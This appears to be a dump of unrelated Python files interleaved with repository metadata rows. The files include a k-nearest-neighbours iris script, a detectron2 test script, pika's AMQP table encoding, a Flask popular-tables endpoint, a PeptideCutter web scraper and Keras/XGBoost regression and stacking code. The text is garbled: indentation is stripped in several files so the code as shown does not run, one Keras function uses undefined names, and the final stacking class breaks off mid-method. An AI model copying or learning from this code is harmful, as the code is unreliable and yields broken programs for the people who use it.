dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
|
[
"MIT"
] | null | null | null |
src/Knn-Tensor.py
|
python-itb/knn-from-scratch
|
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
|
[
"MIT"
] | 2
|
2018-03-20T06:47:32.000Z
|
2018-10-25T10:54:08.000Z
|
src/Knn-Tensor.py
|
python-itb/knn-from-scratch
|
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
|
[
"MIT"
] | 4
|
2018-03-20T06:43:11.000Z
|
2019-04-15T16:34:28.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 13 18:52:28 2018
@author: amajidsinar
"""
from sklearn import datasets
import matplotlib.pyplot as plt
import numpy as np
plt.style.use('seaborn-white')
iris = datasets.load_iris()
dataset = iris.data
# use only the first two feature columns for X
data_known = iris.data[:,:2]
# y
label_known = iris.target
# Plot each class with its own colour:
# matplotlib has no built-in way to label scatter points by class, but each
# separate plt.scatter call gets a distinct colour, so looping over the unique
# labels gives one colour (and one legend entry) per class.
category = np.unique(label_known)
for i in category:
plt.scatter(data_known[label_known==i][:,0],data_known[label_known==i][:,1],label=i)
# Unknown class of a data
data_unknown = np.array([[5.7,3.3],[5.6,3.4],[6.4,3],[8.2,2.2]])
plt.scatter(data_unknown[:,0],data_unknown[:,1], label='?')
plt.legend()
#-------------
# Euclidean Distance
diff = data_known - data_unknown.reshape(data_unknown.shape[0],1,data_unknown.shape[1])
distance = (diff**2).sum(2)
#return sorted index of distance
dist_index = np.argsort(distance)
label = label_known[dist_index]
#for k in [1,2,3,4,5,6,7,8,9,10]:
#keep the rank
k = 10
label = label[:,:k]
label_predict = []
for i in range(data_unknown.shape[0]):
values,counts = np.unique(label[i], return_counts=True)
ind = np.argmax(counts)
label_predict.append(values[ind])
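# Broadcasting sketch for the distance computation above (iris shapes assumed):
# data_known is (150, 2) and data_unknown.reshape(4, 1, 2) broadcasts against it
# to give diff of shape (4, 150, 2); squaring and summing over axis 2 yields a
# (4, 150) distance matrix, argsort ranks the 150 neighbours for each unknown
# point, and the first k columns vote on the predicted label via np.unique counts.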
| 21.149254
| 94
| 0.687368
| 244
| 1,417
| 3.901639
| 0.47541
| 0.080882
| 0.05042
| 0.039916
| 0.042017
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046025
| 0.156669
| 1,417
| 66
| 95
| 21.469697
| 0.750628
| 0.321101
| 0
| 0
| 0
| 0
| 0.014941
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.12
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe35a3606e5ec595f8753af44fd793743da1ae33
| 2,135
|
py
|
Python
|
de_test_tron2.py
|
volpepe/detectron2-ResNeSt
|
1481d50880baa615b873b7a18156c06a5606a85c
|
[
"Apache-2.0"
] | null | null | null |
de_test_tron2.py
|
volpepe/detectron2-ResNeSt
|
1481d50880baa615b873b7a18156c06a5606a85c
|
[
"Apache-2.0"
] | null | null | null |
de_test_tron2.py
|
volpepe/detectron2-ResNeSt
|
1481d50880baa615b873b7a18156c06a5606a85c
|
[
"Apache-2.0"
] | null | null | null |
import torch, torchvision
import detectron2
from detectron2.utils.logger import setup_logger
setup_logger()
# import some common libraries
import numpy as np
import os, json, cv2, random
# import some common detectron2 utilities
from detectron2 import model_zoo
from detectron2.engine import DefaultPredictor
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.data import MetadataCatalog, DatasetCatalog
import argparse, time
def parse_args():
p = argparse.ArgumentParser()
p.add_argument("-i", "--image", type=str, help="Path to image to segment")
p.add_argument("-m", "--model", type=str, help="Model to use", default="COCO-InstanceSegmentation/mask_cascade_rcnn_ResNeSt_200_FPN_syncBN_all_tricks_3x.yaml")
p.add_argument("-t", "--threshold", type=float, help="Threshold for model detections", default=0.4)
p.add_argument("-rs", "--use_resnest", type=bool, help="Whether the selected model uses ResNeSt backbone or no", default=True)
return p.parse_args()
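# Example invocation (illustrative paths, defaults as defined above):
#   python de_test_tron2.py --image ./some_image.jpg --threshold 0.5
# which runs the default ResNeSt-backed cascade Mask R-CNN config and writes
# the visualised detections to output.jpg.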
def start_segment(args):
img = args.image
model = args.model
thresh = args.threshold
use_resnest = args.use_resnest
im = cv2.imread(img)
# get default cfg file
cfg = get_cfg()
# replace cfg from specific model yaml file
cfg.merge_from_file(model_zoo.get_config_file(model))
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = thresh # set threshold for this model
# Find a model from detectron2's model zoo. You can use the https://dl.fbaipublicfiles... url as well
cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(model, resnest=use_resnest)
predictor = DefaultPredictor(cfg)
start = time.time()
outputs = predictor(im)
print("Time eplased: {}".format(time.time() - start))
v = Visualizer(im[:, :, ::-1], MetadataCatalog.get(cfg.DATASETS.TRAIN[0]), scale=1.2) #rgb image (::-1)
out = v.draw_instance_predictions(outputs["instances"].to("cpu"))
cv2.imwrite("output.jpg", out.get_image()[:, :, ::-1])
if __name__ == "__main__":
args = parse_args()
start_segment(args)
| 40.283019
| 164
| 0.710539
| 293
| 2,135
| 5.010239
| 0.450512
| 0.066757
| 0.032698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013575
| 0.171897
| 2,135
| 53
| 165
| 40.283019
| 0.816742
| 0.129274
| 0
| 0
| 0
| 0
| 0.165556
| 0.047222
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051282
| false
| 0
| 0.282051
| 0
| 0.358974
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe35e371f2d0a2c205ae69e2ee6c811fd9ed1de5
| 8,916
|
py
|
Python
|
pika/data.py
|
Pankrat/pika
|
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
|
[
"BSD-3-Clause"
] | null | null | null |
pika/data.py
|
Pankrat/pika
|
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
|
[
"BSD-3-Clause"
] | null | null | null |
pika/data.py
|
Pankrat/pika
|
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
|
[
"BSD-3-Clause"
] | null | null | null |
"""AMQP Table Encoding/Decoding"""
import struct
import decimal
import calendar
from datetime import datetime
from pika import exceptions
from pika.compat import unicode_type, PY2, long, as_bytes
def encode_short_string(pieces, value):
"""Encode a string value as short string and append it to pieces list
returning the size of the encoded value.
:param list pieces: Already encoded values
:param value: String value to encode
:type value: str or unicode
:rtype: int
"""
encoded_value = as_bytes(value)
length = len(encoded_value)
# 4.2.5.3
# Short strings, stored as an 8-bit unsigned integer length followed by zero
# or more octets of data. Short strings can carry up to 255 octets of UTF-8
# data, but may not contain binary zero octets.
# ...
# 4.2.5.5
# The server SHOULD validate field names and upon receiving an invalid field
# name, it SHOULD signal a connection exception with reply code 503 (syntax
# error).
# -> validate length (avoid truncated utf-8 / corrupted data), but skip null
# byte check.
if length > 255:
raise exceptions.ShortStringTooLong(encoded_value)
pieces.append(struct.pack('B', length))
pieces.append(encoded_value)
return 1 + length
if PY2:
def decode_short_string(encoded, offset):
"""Decode a short string value from ``encoded`` data at ``offset``.
"""
length = struct.unpack_from('B', encoded, offset)[0]
offset += 1
# Kept for compatibility with the original Python 2 code path: it tries to
# coerce the slice to bytes and silently keeps the original value if that fails.
value = encoded[offset:offset + length]
try:
value = bytes(value)
except UnicodeEncodeError:
pass
offset += length
return value, offset
else:
def decode_short_string(encoded, offset):
"""Decode a short string value from ``encoded`` data at ``offset``.
"""
length = struct.unpack_from('B', encoded, offset)[0]
offset += 1
value = encoded[offset:offset + length].decode('utf8')
offset += length
return value, offset
def encode_table(pieces, table):
"""Encode a dict as an AMQP table appending the encded table to the
pieces list passed in.
:param list pieces: Already encoded frame pieces
:param dict table: The dict to encode
:rtype: int
"""
table = table or {}
length_index = len(pieces)
pieces.append(None) # placeholder
tablesize = 0
for (key, value) in table.items():
tablesize += encode_short_string(pieces, key)
tablesize += encode_value(pieces, value)
pieces[length_index] = struct.pack('>I', tablesize)
return tablesize + 4
def encode_value(pieces, value):
"""Encode the value passed in and append it to the pieces list returning
the size of the encoded value.
:param list pieces: Already encoded values
:param any value: The value to encode
:rtype: int
"""
if PY2:
if isinstance(value, basestring):
if isinstance(value, unicode_type):
value = value.encode('utf-8')
pieces.append(struct.pack('>cI', b'S', len(value)))
pieces.append(value)
return 5 + len(value)
else:
# support only str on Python 3
if isinstance(value, str):
value = value.encode('utf-8')
pieces.append(struct.pack('>cI', b'S', len(value)))
pieces.append(value)
return 5 + len(value)
if isinstance(value, bool):
pieces.append(struct.pack('>cB', b't', int(value)))
return 2
if isinstance(value, long):
pieces.append(struct.pack('>cq', b'l', value))
return 9
elif isinstance(value, int):
pieces.append(struct.pack('>ci', b'I', value))
return 5
elif isinstance(value, decimal.Decimal):
value = value.normalize()
if value.as_tuple().exponent < 0:
decimals = -value.as_tuple().exponent
raw = int(value * (decimal.Decimal(10) ** decimals))
pieces.append(struct.pack('>cBi', b'D', decimals, raw))
else:
# per spec, the "decimals" octet is unsigned (!)
pieces.append(struct.pack('>cBi', b'D', 0, int(value)))
return 6
elif isinstance(value, datetime):
pieces.append(struct.pack('>cQ', b'T',
calendar.timegm(value.utctimetuple())))
return 9
elif isinstance(value, dict):
pieces.append(struct.pack('>c', b'F'))
return 1 + encode_table(pieces, value)
elif isinstance(value, list):
p = []
for v in value:
encode_value(p, v)
piece = b''.join(p)
pieces.append(struct.pack('>cI', b'A', len(piece)))
pieces.append(piece)
return 5 + len(piece)
elif value is None:
pieces.append(struct.pack('>c', b'V'))
return 1
else:
raise exceptions.UnsupportedAMQPFieldException(pieces, value)
def decode_table(encoded, offset):
"""Decode the AMQP table passed in from the encoded value returning the
decoded result and the number of bytes read plus the offset.
:param str encoded: The binary encoded data to decode
:param int offset: The starting byte offset
:rtype: tuple
"""
result = {}
tablesize = struct.unpack_from('>I', encoded, offset)[0]
offset += 4
limit = offset + tablesize
while offset < limit:
key, offset = decode_short_string(encoded, offset)
value, offset = decode_value(encoded, offset)
result[key] = value
return result, offset
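# Minimal round-trip sketch using the helpers above (values restricted to types
# that encode_value supports):
#   pieces = []
#   encode_table(pieces, {'answer': 42, 'greeting': 'hello'})
#   encoded = b''.join(pieces)
#   decoded, _ = decode_table(encoded, 0)
#   # decoded == {'answer': 42, 'greeting': 'hello'}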
def decode_value(encoded, offset):
"""Decode the value passed in returning the decoded value and the number
of bytes read in addition to the starting offset.
:param str encoded: The binary encoded data to decode
:param int offset: The starting byte offset
:rtype: tuple
:raises: pika.exceptions.InvalidFieldTypeException
"""
# slice to get bytes in Python 3 and str in Python 2
kind = encoded[offset:offset + 1]
offset += 1
# Bool
if kind == b't':
value = struct.unpack_from('>B', encoded, offset)[0]
value = bool(value)
offset += 1
# Short-Short Int
elif kind == b'b':
value = struct.unpack_from('>B', encoded, offset)[0]
offset += 1
# Short-Short Unsigned Int
elif kind == b'B':
value = struct.unpack_from('>b', encoded, offset)[0]
offset += 1
# Short Int
elif kind == b'U':
value = struct.unpack_from('>h', encoded, offset)[0]
offset += 2
# Short Unsigned Int
elif kind == b'u':
value = struct.unpack_from('>H', encoded, offset)[0]
offset += 2
# Long Int
elif kind == b'I':
value = struct.unpack_from('>i', encoded, offset)[0]
offset += 4
# Long Unsigned Int
elif kind == b'i':
value = struct.unpack_from('>I', encoded, offset)[0]
offset += 4
# Long-Long Int
elif kind == b'L':
value = long(struct.unpack_from('>q', encoded, offset)[0])
offset += 8
# Long-Long Unsigned Int
elif kind == b'l':
value = long(struct.unpack_from('>Q', encoded, offset)[0])
offset += 8
# Float
elif kind == b'f':
value = struct.unpack_from('>f', encoded, offset)[0]
offset += 4
# Double
elif kind == b'd':
value = struct.unpack_from('>d', encoded, offset)[0]
offset += 8
# Decimal
elif kind == b'D':
decimals = struct.unpack_from('B', encoded, offset)[0]
offset += 1
raw = struct.unpack_from('>i', encoded, offset)[0]
offset += 4
value = decimal.Decimal(raw) * (decimal.Decimal(10) ** -decimals)
# Short String
elif kind == b's':
value, offset = decode_short_string(encoded, offset)
# Long String
elif kind == b'S':
length = struct.unpack_from('>I', encoded, offset)[0]
offset += 4
value = encoded[offset:offset + length].decode('utf8')
offset += length
# Field Array
elif kind == b'A':
length = struct.unpack_from('>I', encoded, offset)[0]
offset += 4
offset_end = offset + length
value = []
while offset < offset_end:
v, offset = decode_value(encoded, offset)
value.append(v)
# Timestamp
elif kind == b'T':
value = datetime.utcfromtimestamp(struct.unpack_from('>Q', encoded,
offset)[0])
offset += 8
# Field Table
elif kind == b'F':
(value, offset) = decode_table(encoded, offset)
# Null / Void
elif kind == b'V':
value = None
else:
raise exceptions.InvalidFieldTypeException(kind)
return value, offset
| 30.534247
| 80
| 0.596456
| 1,137
| 8,916
| 4.628848
| 0.176781
| 0.079042
| 0.057762
| 0.068402
| 0.444233
| 0.372221
| 0.312939
| 0.302679
| 0.295839
| 0.255368
| 0
| 0.014191
| 0.288694
| 8,916
| 291
| 81
| 30.639175
| 0.815673
| 0.250561
| 0
| 0.306358
| 0
| 0
| 0.018185
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040462
| false
| 0.00578
| 0.034682
| 0
| 0.16763
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe372dac70d64a37ad3e688bb47fa5b1bd4ad42e
| 528
|
py
|
Python
|
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
|
Agi-dev/pylaas_core
|
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
|
[
"MIT"
] | null | null | null |
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
|
Agi-dev/pylaas_core
|
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
|
[
"MIT"
] | 2
|
2021-03-25T21:30:41.000Z
|
2021-06-01T21:25:37.000Z
|
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
|
Agi-dev/pylaas_core
|
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
|
[
"MIT"
] | null | null | null |
from pylaas_core.abstract.abstract_service import AbstractService
import time
from pylaas_core.interface.technical.container_configurable_aware_interface import ContainerConfigurableAwareInterface
class DummyConfigurable(AbstractService, ContainerConfigurableAwareInterface):
def __init__(self) -> None:
super().__init__()
self._microtime = int(round(time.time() * 1000))
self._configs = None
def set_configs(self, configurations):
self._configs = configurations
return self
| 31.058824
| 118
| 0.765152
| 51
| 528
| 7.568627
| 0.568627
| 0.051813
| 0.072539
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00907
| 0.164773
| 528
| 16
| 119
| 33
| 0.866213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.272727
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3be5e4c8643dd88fcaa6473267f6ae2cf76961
| 1,706
|
py
|
Python
|
examples/peptidecutter/advanced.py
|
zjuchenyuan/EasyLogin
|
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
|
[
"MIT"
] | 33
|
2016-12-01T01:33:31.000Z
|
2021-05-12T03:32:27.000Z
|
examples/peptidecutter/advanced.py
|
zjuchenyuan/EasyLogin
|
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
|
[
"MIT"
] | 2
|
2018-04-26T06:58:29.000Z
|
2020-01-11T15:18:14.000Z
|
examples/peptidecutter/advanced.py
|
zjuchenyuan/EasyLogin
|
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
|
[
"MIT"
] | 4
|
2017-02-24T11:08:45.000Z
|
2021-01-13T16:00:33.000Z
|
from EasyLogin import EasyLogin
from pprint import pprint
def peptidecutter(oneprotein):
a = EasyLogin(proxy="socks5://127.0.0.1:1080") #speed up by using proxy
a.post("http://web.expasy.org/cgi-bin/peptide_cutter/peptidecutter.pl",
"protein={}&enzyme_number=all_enzymes&special_enzyme=Chym&min_prob=&block_size=60&alphtable=alphtable&cleave_number=all&cleave_exactly=&cleave_range_min=&cleave_range_max=".format(oneprotein)
)
table=a.b.find("table",{"class":"proteomics2"})
tds=table.find_all("td")
result = []
oneline = []
i = 0
for td in tds:
i+=1
if i==1:
content = td.text
elif i==2:
content = int(td.text)
else:
content = [int(i) for i in td.text.split()]
oneline.append(content)
if i==3:
result.append(oneline)
oneline=[]
i=0
return result
def fasta_reader(filename):
filecontents = open(filename).read().split("\n")
name = ""
thedata = ""
result=[]
for line in filecontents:
if not len(line): continue
if line[0]=='>':
if len(thedata):
result.append([name,thedata])
thedata = ""
name = line
else:
thedata += line
result.append([name,thedata])#don't forget the last one
return result
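# fasta_reader sketch on a hypothetical two-record file:
#   >protein_one
#   SERVELAT
#   >protein_two
#   PEPTIDEPEPTIDE
# is returned as [['>protein_one', 'SERVELAT'], ['>protein_two', 'PEPTIDEPEPTIDE']],
# i.e. one [header, concatenated-sequence] pair per record, with multi-line
# sequences joined together.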
def peptidecutter_more(filename):
return [ [name,peptidecutter(oneprotein)] for name,oneprotein in fasta_reader(filename) ]
if __name__ == "__main__":
#pprint(peptidecutter("SERVELAT"))
import sys
pprint(peptidecutter_more(sys.argv[1]))
| 30.464286
| 200
| 0.579132
| 203
| 1,706
| 4.743842
| 0.458128
| 0.018692
| 0.018692
| 0.047767
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018257
| 0.293669
| 1,706
| 55
| 201
| 31.018182
| 0.780913
| 0.047479
| 0
| 0.297872
| 0
| 0.021277
| 0.183908
| 0.123244
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.06383
| 0.021277
| 0.191489
| 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3e731bfc56815773233eb7a914918e37d052e2
| 974
|
py
|
Python
|
metadata_service/api/popular_tables.py
|
worldwise001/amundsenmetadatalibrary
|
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
|
[
"Apache-2.0"
] | null | null | null |
metadata_service/api/popular_tables.py
|
worldwise001/amundsenmetadatalibrary
|
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
|
[
"Apache-2.0"
] | 1
|
2019-09-21T23:59:46.000Z
|
2019-09-21T23:59:46.000Z
|
metadata_service/api/popular_tables.py
|
worldwise001/amundsenmetadatalibrary
|
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
|
[
"Apache-2.0"
] | 1
|
2019-09-21T23:56:40.000Z
|
2019-09-21T23:56:40.000Z
|
from http import HTTPStatus
from typing import Iterable, Union, Mapping
from flask import request
from flask_restful import Resource, fields, marshal
from metadata_service.proxy import get_proxy_client
popular_table_fields = {
'database': fields.String,
'cluster': fields.String,
'schema': fields.String,
'table_name': fields.String(attribute='name'),
'table_description': fields.String(attribute='description'), # Optional
}
popular_tables_fields = {
'popular_tables': fields.List(fields.Nested(popular_table_fields))
}
class PopularTablesAPI(Resource):
"""
PopularTables API
"""
def __init__(self) -> None:
self.client = get_proxy_client()
def get(self) -> Iterable[Union[Mapping, int, None]]:
limit = request.args.get('limit', 10, type=int)
popular_tables = self.client.get_popular_tables(num_entries=limit)
return marshal({'popular_tables': popular_tables}, popular_tables_fields), HTTPStatus.OK
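# Example of the marshalled response shape (illustrative values only):
# {
#   "popular_tables": [
#     {"database": "hive", "cluster": "gold", "schema": "core",
#      "table_name": "fact_rides", "table_description": "Ride facts"}
#   ]
# }
# returned together with HTTPStatus.OK.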
| 29.515152
| 96
| 0.722793
| 115
| 974
| 5.886957
| 0.417391
| 0.134417
| 0.084195
| 0.076809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00246
| 0.165298
| 974
| 32
| 97
| 30.4375
| 0.830258
| 0.027721
| 0
| 0
| 0
| 0
| 0.103115
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.227273
| 0
| 0.409091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3ee793457d0725edb13bd4a978ffe58340aff1
| 11,708
|
py
|
Python
|
others/Keras_custom_error.py
|
rahasayantan/Work-For-Reference
|
e052da538df84034ec5a0fe3b19c4287de307286
|
[
"MIT"
] | null | null | null |
others/Keras_custom_error.py
|
rahasayantan/Work-For-Reference
|
e052da538df84034ec5a0fe3b19c4287de307286
|
[
"MIT"
] | null | null | null |
others/Keras_custom_error.py
|
rahasayantan/Work-For-Reference
|
e052da538df84034ec5a0fe3b19c4287de307286
|
[
"MIT"
] | null | null | null |
# define custom R2 metrics for Keras backend
from keras import backend as K
def r2_keras(y_true, y_pred):
SS_res = K.sum(K.square( y_true - y_pred ))
SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) )
return ( 1 - SS_res/(SS_tot + K.epsilon()) )
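# r2_keras implements the coefficient of determination R^2 = 1 - SS_res / SS_tot,
# with SS_res = sum((y_true - y_pred)^2) and SS_tot = sum((y_true - mean(y_true))^2);
# K.epsilon() only guards against division by zero. A perfect fit scores 1.0 and
# always predicting the mean scores roughly 0.0.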
# base model architecture definition
def model():
model = Sequential()
#input layer
model.add(Dense(input_dims, input_dim=input_dims))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dropout(0.3))
# hidden layers
model.add(Dense(input_dims))
model.add(BatchNormalization())
model.add(Activation(act_func))
model.add(Dropout(0.3))
model.add(Dense(input_dims//2))
model.add(BatchNormalization())
model.add(Activation(act_func))
model.add(Dropout(0.3))
model.add(Dense(input_dims//4, activation=act_func))
# output layer (y_pred)
model.add(Dense(1, activation='linear'))
# compile this model
model.compile(loss='mean_squared_error', # one may use 'mean_absolute_error' as alternative
optimizer='adam',
metrics=[r2_keras] # you can add several if needed
)
# Visualize NN architecture
print(model.summary())
return model
################K2
import pandas as pd
import numpy as np
from sklearn.feature_selection import SelectFromModel
from sklearn.linear_model import LassoCV
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import RobustScaler
from keras import backend as K
from keras.models import Sequential
from keras.layers import Dense, InputLayer, GaussianNoise
from keras.wrappers.scikit_learn import KerasRegressor
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
#
# Data preparation
#
y_train = train['y'].values
id_test = test['ID']
num_train = len(train)
df_all = pd.concat([train, test])
df_all.drop(['ID', 'y'], axis=1, inplace=True)
# One-hot encoding of categorical/strings
df_all = pd.get_dummies(df_all, drop_first=True)
# Sscaling features
scaler = RobustScaler()
df_all = scaler.fit_transform(df_all)
train = df_all[:num_train]
test = df_all[num_train:]
# Keep only the most contributing features
sfm = SelectFromModel(LassoCV())
sfm.fit(train, y_train)
train = sfm.transform(train)
test = sfm.transform(test)
print ('Number of features : %d' % train.shape[1])
def r2_keras(y_true, y_pred):
SS_res = K.sum(K.square( y_true - y_pred ))
SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) )
return ( 1 - SS_res/(SS_tot + K.epsilon()) )
def build_model_fn(neurons=20, noise=0.25):
model = Sequential()
model.add(InputLayer(input_shape=(train.shape[1],)))
model.add(GaussianNoise(noise))
model.add(Dense(neurons, activation='tanh'))
model.add(Dense(1, activation='linear'))
model.compile(loss='mean_squared_error', optimizer='nadam', metrics=[r2_keras])
return model
#
# Tuning model parameters
#
model = KerasRegressor(build_fn=build_model_fn, epochs=75, verbose=0)
gsc = GridSearchCV(
estimator=model,
param_grid={
#'neurons': range(18,31,4),
'noise': [x/20.0 for x in range(3, 7)],
},
#scoring='r2',
scoring='neg_mean_squared_error',
cv=5
)
grid_result = gsc.fit(train, y_train)
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
for test_mean, test_stdev, train_mean, train_stdev, param in zip(
grid_result.cv_results_['mean_test_score'],
grid_result.cv_results_['std_test_score'],
grid_result.cv_results_['mean_train_score'],
grid_result.cv_results_['std_train_score'],
grid_result.cv_results_['params']):
print("Train: %f (%f) // Test : %f (%f) with: %r" % (train_mean, train_stdev, test_mean, test_stdev, param))
#
# Train model with best params for submission
#
model = build_model_fn(**grid_result.best_params_)
model.fit(train, y_train, epochs=75, verbose=2)
y_test = model.predict(test).flatten()
df_sub = pd.DataFrame({'ID': id_test, 'y': y_test})
df_sub.to_csv('mercedes-submission.csv', index=False)
#########################
import pandas as pd
import numpy as np
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor
from sklearn.decomposition import PCA, FastICA
from sklearn.preprocessing import RobustScaler
from sklearn.pipeline import make_pipeline, Pipeline, _name_estimators
from sklearn.linear_model import ElasticNet, ElasticNetCV
from sklearn.model_selection import cross_val_score, KFold
from sklearn.metrics import r2_score
from sklearn.base import BaseEstimator, TransformerMixin
import xgboost as xgb
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
y_train = train['y'].values
y_mean = np.mean(y_train)
id_test = test['ID']
num_train = len(train)
df_all = pd.concat([train, test])
df_all.drop(['ID', 'y'], axis=1, inplace=True)
# One-hot encoding of categorical/strings
df_all = pd.get_dummies(df_all, drop_first=True)
train = df_all[:num_train]
test = df_all[num_train:]
class AddColumns(BaseEstimator, TransformerMixin):
def __init__(self, transform_=None):
self.transform_ = transform_
def fit(self, X, y=None):
self.transform_.fit(X, y)
return self
def transform(self, X, y=None):
xform_data = self.transform_.transform(X, y)
return np.append(X, xform_data, axis=1)
class LogExpPipeline(Pipeline):
def fit(self, X, y):
super(LogExpPipeline, self).fit(X, np.log1p(y))
def predict(self, X):
return np.expm1(super(LogExpPipeline, self).predict(X))
#
# Model/pipeline with scaling,pca,svm
#
svm_pipe = LogExpPipeline(_name_estimators([RobustScaler(),
PCA(),
SVR(kernel='rbf', C=1.0, epsilon=0.05)]))
# results = cross_val_score(svm_pipe, train, y_train, cv=5, scoring='r2')
# print("SVM score: %.4f (%.4f)" % (results.mean(), results.std()))
# exit()
#
# Model/pipeline with scaling,pca,ElasticNet
#
en_pipe = LogExpPipeline(_name_estimators([RobustScaler(),
PCA(n_components=125),
ElasticNet(alpha=0.001, l1_ratio=0.1)]))
#
# XGBoost model
#
xgb_model = xgb.sklearn.XGBRegressor(max_depth=4, learning_rate=0.005, subsample=0.921,
objective='reg:linear', n_estimators=1300, base_score=y_mean)
xgb_pipe = Pipeline(_name_estimators([AddColumns(transform_=PCA(n_components=10)),
AddColumns(transform_=FastICA(n_components=10, max_iter=500)),
xgb_model]))
# results = cross_val_score(xgb_model, train, y_train, cv=5, scoring='r2')
# print("XGB score: %.4f (%.4f)" % (results.mean(), results.std()))
#
# Random Forest
#
rf_model = RandomForestRegressor(n_estimators=250, n_jobs=4, min_samples_split=25,
min_samples_leaf=25, max_depth=3)
# results = cross_val_score(rf_model, train, y_train, cv=5, scoring='r2')
# print("RF score: %.4f (%.4f)" % (results.mean(), results.std()))
#
# Now the training and stacking part. In a previous version each model was
# trained separately and the best combination picked by hand, which led to a
# poor (likely overfit) score. The code below does out-of-fold
# training/predictions and then combines the final results.
#
# Read here for more explanation (this code was borrowed/adapted):
#
class Ensemble(object):
def __init__(self, n_splits, stacker, base_models):
self.n_splits = n_splits
self.stacker = stacker
self.base_models = base_models
def fit_predict(self, X, y, T):
X = np.array(X)
y = np.array(y)
T = np.array(T)
folds = list(KFold(n_splits=self.n_splits, shuffle=True, random_state=2016).split(X, y))
S_train = np.zeros((X.shape[0], len(self.base_models)))
S_test = np.zeros((T.shape[0], len(self.base_models)))
for i, clf in enumerate(self.base_models):
S_test_i = np.zeros((T.shape[0], self.n_splits))
for j, (train_idx, test_idx) in enumerate(folds):
X_train = X[train_idx]
y_train = y[train_idx]
X_holdout = X[test_idx]
y_holdout = y[test_idx]
clf.fit(X_train, y_train)
y_pred = clf.predict(X_holdout)[:]
print ("Model %d fold %d score %f" % (i, j, r2_score(y_holdout, y_pred)))
S_train[test_idx, i] = y_pred
S_test_i[:, j] = clf.predict(T)[:]
S_test[:, i] = S_test_i.mean(axis=1)
# results = cross_val_score(self.stacker, S_train, y, cv=5, scoring='r2')
# print("Stacker score: %.4f (%.4f)" % (results.mean(), results.std()))
# exit()
self.stacker.fit(S_train, y)
